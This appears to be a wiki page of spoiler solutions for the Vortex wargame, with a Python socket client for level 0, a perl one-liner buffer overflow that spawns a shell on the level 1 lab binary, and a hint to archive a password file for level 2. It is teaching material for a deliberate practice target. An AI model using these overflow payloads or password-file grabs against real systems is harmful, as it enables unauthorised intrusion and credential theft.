Wicrawl Roadmap
Contents |
[edit] Overview
This section contains some notes and solutions to the challenges on [1].
There are spoilers on this page, so don't read too far if you don't want your education to suffer.
[edit] Level 0
The instructions don't say that you have to send the results back in binary, and that it should probably be a 64-bit integer ("long long"), because 4 random 32-bit numbers usually add up to something bigger than a 32-bit integer. Here's one way to do it:
#!/usr/bin/env python
import sys
from struct import *
from socket import *
s = socket(AF_INET, SOCK_STREAM)
s.connect(("vortex.labs.pulltheplug.org", 5842))
buf = ""
while len(buf) < 16:
buf = buf + s.recv(4)
print len(buf)
ints = unpack("IIII", buf)
result = ints[0] + ints[1] + ints[2] + ints[3]
print result
s.send(pack("Q", result))
print s.recv(1000)
[edit] Level 1
The first thing we need to do is make a stack picture. It looks like this:
^ | higher memory RIP MSB RIP RIP RIP LSB EBP MSB EBP EBP EBP LSB buf[255] buf[254] . . . buf[0] ptr MSB <-- target ptr ptr ptr LSB lower memory | v
MSB stands for most significant byte, and LSB stands for least significant byte. Remember that on x86, the four bytes of a four-byte integer are stored in little-endian order, so the LSB is the first thing in memory if you're looking from low to high memory.
The trick here is to write two bytes after decrementing the pointer, because you have to trigger the call to e() after writing the 0xca overflow byte. Now, if you do something like this:
perl -e 'print "\\" x 257 . "\xca"' >> /tmp/slashes /levels/level1 < /tmp/slashes
You'll see this:
bash-2.05b$ /levels/level1 < /tmp/slashes sh-2.05b$ exit bash-2.05b$
What happened?
Well, after the shell spawns, it tries to read some commands from standard input. But you redirected its standard input from the file /tmp/slashes, and you've read all the input from it to do your sploit. So, the shell tries to read and gets an EOF, which is the same thing as the exit command in bash. Try it by hitting CTRL-D, the UNIX EOF character, in a shell -- you'll immediately get logged out.
So that the exec'ed shell doesn't immediately read EOF and quit, you can cut and paste the overflow string to the terminal while executing level1 interactively. That way, your keyboard will be connected to the spawned shell's standard input, and you can run commands.
[edit] Level 2
Just create a tar archive. But what to put in it? The password, of course, which is in /etc/pass/level3.